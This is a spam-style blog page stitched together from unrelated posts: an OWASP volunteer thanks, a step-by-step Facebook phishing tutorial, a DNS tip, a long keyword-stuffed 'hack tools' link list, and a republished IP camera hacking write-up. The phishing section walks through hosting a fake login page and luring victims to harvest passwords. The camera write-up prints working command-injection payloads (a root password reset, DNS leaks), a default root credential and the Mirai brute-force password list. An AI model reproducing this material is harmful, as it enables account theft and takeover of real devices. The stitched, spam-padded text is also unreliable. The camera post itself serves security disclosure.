Wednesday, May 31, 2023

Thank You To Volunteers And Board Members That Worked BlackHat Booth 2019

The OWASP Foundation would like to thank the OWASP Las Vegas Chapter Volunteers for taking the time out of their busy schedule to give back and volunteer to work the booth at BlackHat 2019.  It was great meeting our Las Vegas OWASP members and working with Jorge, Carmi, Dave, and Nancy.  
Also, take a moment to thank Global Board Members Martin Knobloch, Owen Pendlebury, and Gary Robinson for also working the booth and speaking with individuals and groups to answer questions on projects and suggestions on the use of our tools to address their work problems.
OWASP can not exist without support from our members.  Related links

HOW TO HACK A FACEBOOK ACCOUNT? STEP BY STEP

Phishing is the way to obtain sensitive information such as usernames, passwords, and credit card details or any other confidential information, often for malicious reasons, by disguising as a trustworthy entity in an electronic communication. Phishing is typically carried out by several ways like email spoofing or instant messaging, and it often directs users to enter personal information at a fake website, the look and feel of which are almost identical to the legitimate one. In this tutorial, I will be showing how to hack a facebook account through phishing.

SO, HOW TO HACK A FACEBOOK ACCOUNT?

There are few techniques by which you can hack a facebook account but here the easiest way we'll discuss.

REQUIREMENTS

  1. Phisher Creator ( Fake page generator)
  2. Hosting ( To host a fake page). Either you can purchase one or also can use free hosting like 110mb.com. But in free hosting, the account will be suspended after a few logins.

STEPS TO FOLLOW

  1. Download phisher creator and run it.
  2. As you run it, you'll see a screen like the shown below. Here you can type the fields as I have done. 
  3. Once you hit the Create Phisher button, it'll create a fake facebook index page and fb_login.php file in the output folder.
  4. Now you need to upload these both files index.html and fb_login.php to the hosting account.
  5. After uploading the file, open the index.html file path. It will open up a page like same facebook page as you can see below.
  6. We're all done, now we just need to copy the URL of our fake page and distribute it to the victims, you just have to trick them with your social engineering that how you convenience them to open this URL to login facebook. Once someone tries to login through your fake facebook page URL, you'll get their account username and password in the log_file.txt in the same directory of hosting where you have uploaded index.php and fb_login.php.
Hope it'll work fine for you and you have learned how to hack a facebook account. If you find any question or query related to this, feel free to comment below or you can also follow another way that might work well for you to hack facebook account.

Related news


Tuesday, May 30, 2023

HOW TO BOOST UP BROWSING SPEED?

Internet speed is the most cared factor when you buy an internet connection. What if still, you face a slow speed browsing problem? No worries, as I came with a solution to this problem. I will let you know how to boost up browsing speed. It's very simple to follow.

SO, HOW TO BOOST UP BROWSING SPEED?

There can be many ways you can get a speedy browsing whether you use paid service or free hacks. I am going to share this free speed hack with you.

STEPS TO FOLLOW

  1. Navigate to Control Panel > Network and Internet Options > Network and Sharing Center.
  2. Now look for the active internet connection to which you're currently connected to.
  3. Open up Connection Properties of your active connection.
  4. Click on IPv4 and open its Properties.
  5. Here you will notice your DNS, you just need to change your DNS address with the following DNS.
    Preferred DNS server: 208.67.222.222
    Alternate DNS server: 208.67.220.220
  6. Once done, save it and no configure it for IPv6. Just change the IPv6 DNS with the following DNS.
    Preferred DNS server: 2620:0:ccc::2

    Alternate DNS server: 2620:0:CCD::2
  7. Finally, save and you're done with it.
That's all. You have successfully learned how to boost up browsing speed. Hope it will work for you. Enjoy speedy internet..!

Related links


  1. New Hack Tools
  2. Hacking Tools
  3. Hacks And Tools
  4. New Hack Tools
  5. Hacker Tools Free Download
  6. Pentest Tools For Ubuntu
  7. Hack App
  8. Hacking Tools For Windows 7
  9. Github Hacking Tools
  10. Hacking Tools 2020
  11. Pentest Box Tools Download
  12. Hack App
  13. Best Hacking Tools 2019
  14. Pentest Tools Subdomain
  15. Hacking Tools Usb
  16. Pentest Tools Github
  17. Ethical Hacker Tools
  18. Hacker Tools For Pc
  19. Hacker Tools Software
  20. Hacker Tools For Pc
  21. Hacking Tools For Games
  22. Hacker Tools Windows
  23. Hacker Tools Linux
  24. Pentest Tools Linux
  25. Hack Apps
  26. Pentest Tools Kali Linux
  27. Pentest Tools Download
  28. Hack Tools For Windows
  29. Hack Rom Tools
  30. Hacking Tools Windows 10
  31. Hacking Tools Online
  32. Pentest Tools Website Vulnerability
  33. Pentest Tools Find Subdomains
  34. Wifi Hacker Tools For Windows
  35. Pentest Tools
  36. Pentest Box Tools Download
  37. Github Hacking Tools
  38. Hacker Tools Free
  39. Hacker Tools Hardware
  40. Hacker Techniques Tools And Incident Handling
  41. Hacking Tools Kit
  42. Hacking App
  43. Blackhat Hacker Tools
  44. Pentest Tools Framework
  45. Hacks And Tools
  46. Hacking Tools Kit
  47. Hack Tools For Ubuntu
  48. Hacker Tool Kit
  49. Hacker Tools Apk Download
  50. Hackrf Tools
  51. Hack Tools
  52. Hack Tools For Windows
  53. New Hack Tools
  54. Hacker Tools Free
  55. Hack Tools Pc
  56. Hacking Tools For Windows 7
  57. Game Hacking
  58. Best Hacking Tools 2020
  59. What Are Hacking Tools
  60. Hacking Tools Pc
  61. Hack Tools Online
  62. Pentest Tools
  63. Pentest Automation Tools
  64. Pentest Tools Apk
  65. Hacker Tools Windows
  66. How To Hack
  67. Best Hacking Tools 2019
  68. Hacking Tools Github
  69. Best Pentesting Tools 2018
  70. Pentest Tools Download
  71. Hack Tools
  72. Hack Tools For Games
  73. Black Hat Hacker Tools
  74. Install Pentest Tools Ubuntu
  75. What Is Hacking Tools
  76. Pentest Tools Website
  77. Hacking Tools Usb
  78. Hacking Tools
  79. Hack Tools Github
  80. World No 1 Hacker Software
  81. Android Hack Tools Github
  82. Hacker Tools Free Download
  83. World No 1 Hacker Software
  84. Hacking Tools For Pc
  85. Tools 4 Hack
  86. Pentest Tools Bluekeep
  87. Pentest Tools Port Scanner
  88. Pentest Tools
  89. Hacker Tools Mac
  90. Hackers Toolbox
  91. Pentest Tools Subdomain
  92. Pentest Tools For Ubuntu
  93. Nsa Hacker Tools
  94. Hacks And Tools
  95. Hacker Tool Kit
  96. Pentest Tools For Ubuntu
  97. Hacking Tools Usb
  98. Hackers Toolbox
  99. Pentest Tools Framework
  100. Hacker Tools Linux
  101. Hacker Search Tools
  102. Beginner Hacker Tools
  103. Hack Tools For Games
  104. Tools Used For Hacking
  105. Hacking Tools Pc
  106. Hacker Tools Hardware
  107. Hack Tools For Windows
  108. Pentest Tools Online
  109. Hacker Tools
  110. Hacker Tools List
  111. Hackers Toolbox
  112. Hacker Tools Free Download
  113. Tools Used For Hacking
  114. Pentest Tools Nmap
  115. Pentest Tools Windows
  116. Hacker Search Tools
  117. Pentest Tools Nmap
  118. Hacker Tools For Pc
  119. Pentest Tools For Ubuntu
  120. Best Pentesting Tools 2018
  121. Hacker Hardware Tools
  122. Hacker Security Tools
  123. Hacker Search Tools
  124. Hack Tools
  125. Hacking Tools Software
  126. Hacker Techniques Tools And Incident Handling
  127. Pentest Tools Url Fuzzer
  128. Hackers Toolbox
  129. Hack And Tools
  130. Pentest Recon Tools
  131. Hacker Tools For Ios
  132. Hacking Tools Windows 10
  133. Hacker Tools Windows
  134. Hacking Tools For Windows
  135. Pentest Tools Port Scanner

How I Hacked My IP Camera, And Found This Backdoor Account

The time has come. I bought my second IoT device - in the form of a cheap IP camera. As it was the most affordable among all others, my expectations regarding security was low. But this camera was still able to surprise me.

Maybe I will disclose the camera model used in my hack in this blog later, but first, I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem because they share being developed on the same SDK. Again, my expectations are low on this.

The obvious problems



I opened the box, and I was greeted with a password of four numeric characters. This is the password for the "admin" user, which can configure the device, watch its output video, and so on. Most people don't care to change this anyway.

It is obvious that this camera can talk via Ethernet cable or WiFi. Luckily it supports WPA2, but people can configure it for open unprotected WiFi of course. 

Sniffing the traffic between the camera and the desktop application it is easy to see that it talks via HTTP on port 81. The session management is pure genius. The username and password are sent in every GET request. Via HTTP. Via hopefully not open WiFi. It comes really handy in case you forgot it, but luckily the desktop app already saved the password for you in clear text in 
"C:\Users\<USER>\AppData\Local\VirtualStore\Program Files (x86)\<REDACTED>\list.dat"

This nice camera communicates to the cloud via UDP. The destination servers are in Hong Kong - user.ipcam.hk/user.easyn.hk - and China - op2.easyn.cn/op3.easyn.cn. In case you wonder why an IP camera needs a cloud connection, it is simple. This IP camera has a mobile app for Android and iOS, and via the cloud, the users don't have to bother to configure port forwards or dynamic DNS to access the camera. Nice.

Let's run a quick nmap on this device.
PORT     STATE SERVICE    VERSION 23/tcp   open  telnet     BusyBox telnetd 81/tcp   open  http       GoAhead-Webs httpd | http-auth:  | HTTP/1.1 401 Unauthorized |_  Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81 |_http-methods: No Allow or Public header in OPTIONS response (status code 400) |_http-title: Document Error: Unauthorized 8600/tcp open  tcpwrapped 
The already known HTTP server, a telnet server via BusyBox, and a port on 8600 (have not checked so far). The 27-page long online manual does not mention any Telnet port. How shall we name this port? A debug port? Or a backdoor port? We will see. I manually tried 3 passwords for the user root, but as those did not work, I moved on.

The double-blind command injection

The IP camera can upload photos to a configured FTP server on a scheduled basis. When I configured it, unfortunately, it was not working at all, I got an invalid username/password on the server. After some debugging, it turned out the problem was that I had a special $ character in the password. And this is where the real journey began. I was sure this was a command injection vulnerability, but not sure how to exploit it. There were multiple problems that made the exploitation harder. I call this vulnerability double-blind command injection. The first blind comes from the fact that we cannot see the output of the command, and the second blind comes from the fact that the command was running in a different process than the webserver, thus any time-based injection involving sleep was not a real solution.
But the third problem was the worst. It was limited to 32 characters. I was able to leak some information via DNS, like with the following commands I was able to see the current directory:
$(ping%20-c%202%20%60pwd%60)
or cleaning up after URL decode:
$(ping -c 2 `pwd`)
but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.

The following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
$(cp /etc/passwd /tmp/a)       ;copy /etc/passwd to a file which has a shorter name $(cat /tmp/a|head -1>/tmp/b)   ;filter for the first row $(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters $(ping `cat /tmp/c`)           ;leak it via DNS 
After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...

I also tried commix, as it looked promising on Youtube. Think commix like sqlmap, but for command injection. But this double-blind hack was a bit too much for this automated tool, unfortunately.



But after spending way too much time without progress, I finally found the password to Open Sesame.
$(echo 'root:passwd'|chpasswd)
Now, logging in via telnet
(none) login: root Password:  BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. #  
Woot woot :) I quickly noticed the root of the command injection problem:

# cat /tmp/ftpupdate.sh /system/system/bin/ftp -n<<! open ftp.site.com 21 user ftpuser $(echo 'root:passwd'|chpasswd) binary mkdir  PSD-111111-REDACT cd PSD-111111-REDACT lcd /tmp put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg close bye 

Whenever a command is put into the FTP password field, it is copied into this script, and after the script is scheduled, it is interpreted by the shell as commands. After this I started to panic that I forgot to save the content of the /etc/passwd file, so how am I going to crack the default telnet password? "Luckily", rebooting the camera restored the original password. 

root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

Unfortunately, there is no need to start good-old John The Ripper for this task, as Google can tell you that this is the hash for the password 123456. It is a bit more secure than a luggage password.



It is time to recap what we have. There is an undocumented telnet port on the IP camera, which can be accessed by default with root:123456, there is no GUI to change this password, and changing it via console, it only lasts until the next reboot. I think it is safe to tell this a backdoor.
With this console access we can access the password for the FTP server, for the SMTP server (for alerts), the WiFi password (although we probably already have it), access the regular admin interface for the camera, or just modify the camera as we want. In most deployments, luckily this telnet port is behind NAT or firewall, so not accessible from the Internet. But there are always exceptions. Luckily, UPNP does not configure the Telnet port to be open to the Internet, only the camera HTTP port 81. You know, the one protected with the 4 character numeric password by default.

Last but not least everything is running as root, which is not surprising. 

My hardening list

I added these lines to the end of /system/init/ipcam.sh:
sleep 15 echo 'root:CorrectHorseBatteryRedStaple'|chpasswd 
Also, if you want, you can disable the telnet service by commenting out telnetd in /system/init/ipcam.sh.

If you want to disable the cloud connection (thus rendering the mobile apps unusable), put the following line into the beginning of /system/init/ipcam.sh
iptables -A OUTPUT -p udp ! --dport 53 -j DROP
 
You can use OpenVPN to connect into your home network and access the web interface of the camera. It works from Android, iOS, and any desktop OS.

My TODO list

  • Investigate the script /system/system/bin/gmail_thread
  • Investigate the cloud protocol * - see update 2016 10 27
  • Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn
A quick googling revealed I am not the first finding this telnet backdoor account in IP cameras, although others found it via JTAG firmware dump. 

And 99% of the people who buy these IP cameras think they will be safe with it. Now I understand the sticker which came with the IP camera.


When in the next episode of Mr. Robot, you see someone logging into an IP camera via telnet with root:123456, you will know, it is the sad reality.

If you are interested in generic ways to protect your home against IoT, read my previous blog post on this. 

Update: as you can see in the following screenshot, the bad guys already started to take advantage of this issue ... https://www.incapsula.com/blog/cctv-ddos-botnet-back-yard.html

Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs.

root     xc3511
root     vizxv
root     admin
admin    admin
root     888888
root     xmhdipc
root     default
root     juantech
root     123456
root     54321
support  support
root     (none)
admin    password
root     root
root     12345
user     user
admin    (none)
root     pass
admin    admin1234
root     1111
admin    smcadmin
admin    1111
root     666666
root     password
root     1234
root     klv123
Administrator admin
service  service
supervisor supervisor
guest    guest
guest    12345
guest    12345
admin1   password
administrator 1234
666666   666666
888888   888888
ubnt     ubnt
root     klv1234
root     Zte521
root     hi3518
root     jvbzd
root     anko
root     zlxx.
root     7ujMko0vizxv
root     7ujMko0admin
root     system
root     ikwb
root     dreambox
root     user
root     realtek
root     00000000
admin    1111111
admin    1234
admin    12345
admin    54321
admin    123456
admin    7ujMko0admin
admin    1234
admin    pass
admin    meinsm
tech     tech
mother   fucker

Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included.
Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8
Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk

Update 2017-03-08: "Because of code reusing, the vulnerabilities are present in a massive list of cameras (especially the InfoLeak and the RCE),
which allow us to execute root commands against 1250+ camera models with a pre-auth vulnerability. "https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt

Update 2017-05-11: CVE-2017-5674 (see above), and my command injection exploit was combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."
This issue might be worse than the Mirai worm because these effects cameras and other IoT behind NAT where UPnP was enabled.
http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/


Related articles